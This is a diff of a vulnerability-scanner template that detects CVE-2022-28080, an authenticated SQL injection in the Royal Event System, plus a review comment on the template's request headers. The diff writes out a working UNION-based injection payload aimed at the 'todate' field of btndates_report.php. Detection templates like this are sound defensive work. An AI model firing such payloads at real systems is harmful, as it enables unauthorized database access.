diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml
index 555a81ec0c..9ef9f47616 100644
--- a/cves/2022/CVE-2022-28080.yaml
+++ b/cves/2022/CVE-2022-28080.yaml
@@ -2,90 +2,68 @@ id: CVE-2022-28080 info: name: Royal Event - SQL Injection - author: lucasljm2001,ekrause + author: lucasljm2001,ekrause,ritikchaddha severity: high description: | Detects an SQL Injection vulnerability in Royal Event System reference: + - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - tags: cve,cve2022,sqli,authenticated + tags: cve,cve2022,sqli,authenticated,cms,royalevent requests: - - raw: - + - raw: - | POST /royal_event/ HTTP/1.1 - Host: {{Host}} - Content-Length: 353 - Cache-Control: max-age=0 - sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102" - sec-ch-ua-mobile: ?0 - sec-ch-ua-platform: "Windows" - Upgrade-Insecure-Requests: 1 - Origin: {{Scheme}}://{{Host}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary841M7QIgh7rqLsVh - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Referer: {{Scheme}}://{{Host}}/royal_event/ - Accept-Encoding: gzip, deflate - Accept-Language: es-ES,es;q=0.9 - Connection: close + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="username" + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" - {{username}} - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="password" + {{username}} + 
------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" - {{password}} - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="login" + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" - ------WebKitFormBoundary841M7QIgh7rqLsVh-- + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + - | - POST /royal_event/btndates_report.php#?= HTTP/1.1 - Host: {{Host}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Encoding: gzip, deflate - Accept-Language: en-us,en;q=0.5 - Cache-Control: no-cache - Content-Length: 334 - Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 - Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?= - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - --f289a6438bcc45179bcd3eb7ddc555d0 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="todate" - -'select SomeRandomText from tbladmin-- - --f289a6438bcc45179bcd3eb7ddc555d0 + 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="search" 3 - --f289a6438bcc45179bcd3eb7ddc555d0 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="fromdate" 01/01/2011 - --f289a6438bcc45179bcd3eb7ddc555d0-- + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '{{md5("{{randstr}}")}}' - matchers: - - type: word - words: - - "SomeRandomText" - - - type: status - status: - - 200 + - type: 
status + status: + - 200
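Review bot: The rewritten login request still carries a fixed `Content-Length: 353`, although its multipart body embeds `{{username}}` and `{{password}}`, so the real length depends on the credentials supplied at run time. The second request in this same change dropped its hard-coded length, and the first should do the same by deleting the `Content-Length: 353` line. Depending on how the engine treats a user-supplied length header, the stale value is either ignored or yields a truncated or stalled login. A failed login means the check silently reports nothing on a vulnerable host. Separately, the `description` could name the affected input (the `todate` field of `btndates_report.php`) and state that valid credentials are required, so operators can map a finding to the code that needs parameterized queries.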